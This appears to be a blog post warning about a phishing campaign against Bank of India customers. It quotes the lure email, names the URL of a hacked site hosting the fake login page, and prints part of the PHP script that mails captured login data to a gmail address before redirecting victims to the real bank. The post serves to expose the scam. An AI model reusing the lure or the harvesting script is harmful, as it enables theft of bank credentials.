With long list of Indian Phishing Bank site , now there is raise of Phishing for “Bank Of India”
Here is mail received with intention to phish
Dear Customer,
Bank of India is constantly striving to provide you with more convenience, control, and security to assist in managing your finances.
As part of our ongoing efforts to make it easier and more secure for you to use our online services, we have upgraded to Consent and
Online Access that you reviewed and accepted when you began-to use Bank of India Online® Banking service(s).
To upgrade your Information, please visit our secure server webform by clicking the link below...
Upgrade My Account Security.
This alert relates to your Online Banking Profile only.
Upgrade My Account Security Links to Following hacked site
harveys.ie/images/inet/boi/BankAwayRetail.html
this site reads and sends the account information to an gmail id using a PHP file.
$recipient = "xxxxxx@gmail.com";
$subject = "boi login";
$headers = "BOI@boi.co.in";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{
header("Location: http://www.bankofindia.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
No comments:
Post a Comment